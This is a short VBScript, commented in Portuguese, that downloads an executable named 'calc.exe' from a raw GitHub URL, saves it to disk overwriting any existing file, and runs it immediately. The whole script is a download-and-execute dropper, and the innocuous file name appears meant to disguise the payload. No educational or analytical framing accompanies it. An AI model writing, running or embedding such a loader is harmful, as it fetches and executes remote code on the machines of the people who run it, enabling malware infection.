Set shell = CreateObject("WScript.Shell")
url = "https://raw.githubusercontent.com/rafaelwdornelas/goenvios/main/calc.exe" ' URL do executável
destination = "calc.exe" ' Caminho para salvar o executável

' Cria o objeto XMLHTTP para fazer o download do arquivo
Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", url, False
xhr.Send

' Verifica se o download foi bem-sucedido (status 200)
If xhr.Status = 200 Then
    ' Cria o objeto ADODB.Stream para manipular o arquivo binário
    Set stream = CreateObject("ADODB.Stream")
    stream.Open
    stream.Type = 1 ' Tipo binário
    stream.Write xhr.ResponseBody
    stream.Position = 0
    stream.SaveToFile destination, 2 ' Salva o arquivo e sobrescreve se já existir
    stream.Close
    
    ' Executa o arquivo baixado
    shell.Run destination
End If
